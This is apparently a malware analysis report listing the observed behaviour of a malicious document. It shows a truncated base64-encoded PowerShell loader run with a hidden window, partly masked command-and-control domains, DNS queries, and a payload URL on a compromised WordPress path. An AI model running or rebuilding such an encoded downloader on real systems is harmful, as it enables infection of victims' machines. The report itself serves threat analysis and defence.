Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABaADcAOABtAGsAXwBpAD0AKAAoACcAWgAnACsAJwBqAGkAJwApACsAJwB1ACcAKwAoACcAcwBoACcAKwAnAGUAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtACcAKwAnAGkAdABlAG0AJwApACAAJABFAG4AdgA6AFUAcw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1448
- %TEMP%\843076.cvr
- 'ni###keji.com':443
- 'de####alliance.se':80
- http://de####alliance.se/wp-admin/ovZBX/
- DNS ASK bo#####roadesivos.com
- DNS ASK si####elektrik.com
- DNS ASK ni###keji.com
- DNS ASK cl###raks.com
- DNS ASK cl###room.live
- DNS ASK fu#####onemme.com.ar
- DNS ASK de####alliance.se
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABaADcAOABtAGsAXwBpAD0AKAAoACcAWgAnACsAJwBqAGkAJwApACsAJwB1ACcAKwAoACcAcwBoACcAKwAnAGUAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtACcAKwAnAGkAdABlAG0AJwApACAAJABFAG4AdgA6AFUAcw...' (with hidden window)